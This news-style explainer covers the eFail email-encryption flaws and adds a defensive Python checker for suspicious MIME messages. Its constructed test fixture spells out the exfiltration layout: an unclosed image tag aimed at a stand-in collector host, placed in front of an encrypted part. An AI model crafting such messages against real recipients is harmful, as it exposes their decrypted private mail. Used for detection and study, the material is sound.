Security researchers have urgently disclosed a set of vulnerabilities affecting email clients that utilize two prominent email encryption standards, PGP and S/MIME. This disclosure follows the inadvertent leak of their forthcoming research paper, which was initially scheduled for release tomorrow.
PGP and S/MIME serve as widely adopted end-to-end encryption protocols, designed to safeguard email communications from unauthorized access by companies, governments, or cybercriminals. However, the vulnerabilities do not originate from the encryption methods themselves; rather, they stem from the improper implementation of these technologies by certain email clients and plugins.
The vulnerabilities, referred to as eFail, present a grave risk: they may enable attackers to obtain the decrypted content of past emails that were supposed to remain secure. According to the research team's findings, these weaknesses arise primarily from how email clients handle HTML content and external resources, such as images and stylesheets loaded from external URLs.
The eFail attack exploits the automatic decryption behavior of email clients that are also set to load external resources by default. By sending a modified version of an encrypted email, an attacker can trick a vulnerable email client into revealing the plaintext content of the original message whenever the recipient accesses it. Specifically, the attack involves injecting plaintext into the encrypted email, leading to the exfiltration of the original data once the email is decrypted.
It is important to note that attackers must first gain access to the targeted encrypted emails. They then alter the email’s content and send it back to the recipient to deceive the email client into disclosing sensitive information without notifying the user. The methodology involves transforming an encrypted email into a multipart HTML message and spoofing the sender address to make it appear legitimate.
In this alteration, an unclosed image tag is inserted immediately before the encrypted content. When the targeted email client decrypts the message and renders the HTML, the decrypted text becomes part of the image URL, so the request to the attacker-controlled server carries the plaintext as the requested filename. This allows the attackers to capture the plaintext information at their server.
Although PGP offers integrity warnings if an email’s security is compromised, many email clients fail to display these alerts, making them susceptible to successful eFail attacks.
For protection against eFail vulnerabilities, business owners are advised to select email clients that prominently display integrity warnings and do not automatically render HTML content. The use of an authenticated encryption algorithm for sensitive communications is also encouraged. These recommendations are vital, especially given the increasing sophistication of attackers targeting email encryption users.
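As an added example (not code from the article or from the eFail researchers), the following Python check applies the two points above to a raw MIME message before anything is rendered: it lists the remote resources an HTML part would fetch, and it flags the structure described earlier, a remote-loading tag left unclosed in front of an encrypted part. The function names, the sample messages and the placeholder PGP block are all constructed for this example; only the standard library is used.

```python
"""Pre-render check for the eFail direct-exfiltration structure.

Added example, not code from the article or the eFail researchers. It uses
only the standard library and reports, for one MIME message:
  1. remote resources (images, stylesheets, frames) that an HTML part would
     fetch when rendered, which a safe client should not load automatically;
  2. a remote-loading tag that is never closed before its part ends while a
     later part carries encrypted content. After decryption and rendering,
     the plaintext would be appended to that tag's URL and sent to the server.
"""
import email
import re
from email import policy
from email.message import EmailMessage

# Tags whose src/href triggers a network fetch when HTML is rendered.
REMOTE_TAG_RE = re.compile(r"<(img|link|iframe|object|video|audio|source)\b", re.I)
REMOTE_URL_RE = re.compile(r"""(?:src|href)\s*=\s*["']?(https?://[^"'\s>]*)""", re.I)
PGP_MARKER = "-----BEGIN PGP MESSAGE-----"
ENCRYPTED_TYPES = {
    "application/pgp-encrypted",   # PGP/MIME control part (RFC 3156)
    "application/pkcs7-mime",      # S/MIME enveloped data
    "application/x-pkcs7-mime",
}


def is_encrypted_part(part: EmailMessage) -> bool:
    """True for PGP/MIME or S/MIME parts, or a text part holding inline PGP."""
    if part.get_content_type() in ENCRYPTED_TYPES:
        return True
    if part.get_content_maintype() == "text":
        return PGP_MARKER in part.get_content()
    return False


def unclosed_remote_tags(html: str) -> list[str]:
    """Return remote-loading tags that are never closed with '>' in this part.

    A '>' quoted inside an attribute value would hide an unclosed tag from
    this simple scan; a full HTML tokenizer would be stricter.
    """
    return [html[m.start():].strip()
            for m in REMOTE_TAG_RE.finditer(html)
            if ">" not in html[m.start():]]


def remote_references(html: str) -> list[str]:
    """Return the http(s) URLs that src/href attributes would fetch."""
    return REMOTE_URL_RE.findall(html)


def scan_message(raw: str) -> dict:
    """Parse a raw RFC 5322 message and report remote fetches and exfil risk."""
    msg = email.message_from_string(raw, policy=policy.default)
    report = {"remote_refs": [], "unclosed_tags": [], "exfil_risk": False}
    seen_unclosed = False
    for part in msg.walk():
        if part.is_multipart():
            continue
        if part.get_content_type() == "text/html":
            html = part.get_content()
            report["remote_refs"].extend(remote_references(html))
            unclosed = unclosed_remote_tags(html)
            report["unclosed_tags"].extend(unclosed)
            seen_unclosed = seen_unclosed or bool(unclosed)
        elif seen_unclosed and is_encrypted_part(part):
            # Encrypted content after an unclosed remote tag: once decrypted
            # and rendered, the plaintext would become part of the pending URL.
            report["exfil_risk"] = True
    return report


# Constructed sample: an unclosed <img> in an HTML part precedes an inline-PGP
# part. The PGP block is a placeholder, not real ciphertext.
SUSPICIOUS = """\
From: sender@example.net
To: recipient@example.net
Subject: constructed sample
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html

<img src="http://collector.invalid/
--b1
Content-Type: text/plain

-----BEGIN PGP MESSAGE-----
PLACEHOLDER-CIPHERTEXT
-----END PGP MESSAGE-----
--b1
Content-Type: text/html

">
--b1--
"""

# Constructed benign sample: a remote image, properly closed, no encrypted part.
# It still appears under remote_refs, since a safe client should not fetch it.
BENIGN = """\
From: sender@example.net
To: recipient@example.net
Subject: constructed benign sample
MIME-Version: 1.0
Content-Type: text/html

<p>Hello</p><img src="https://www.example.com/logo.png" alt="logo">
"""

if __name__ == "__main__":
    for name, raw in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, scan_message(raw))
```

The `remote_refs` list is the signal a client or gateway needs to honour the first recommendation (do not fetch external content automatically), while `exfil_risk` captures the specific layout that turns such a fetch into a leak; a reader that refuses to render HTML or load remote resources needs neither, which is the point of the advice above.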
The research was conducted by a team including experts from Münster University of Applied Sciences and Ruhr University Bochum. For further details on the attack technique, interested readers may refer to the findings available on the researchers' website or access the full research paper.
In terms of potential tactics adopted by adversaries in the eFail incidents, the MITRE ATT&CK Framework identifies relevant techniques such as initial access through social engineering, execution via external content loading, and data exfiltration utilizing clever manipulation of email structures. These insights underscore the importance of vigilance and robust security practices in today’s environment of increasing cyber threats.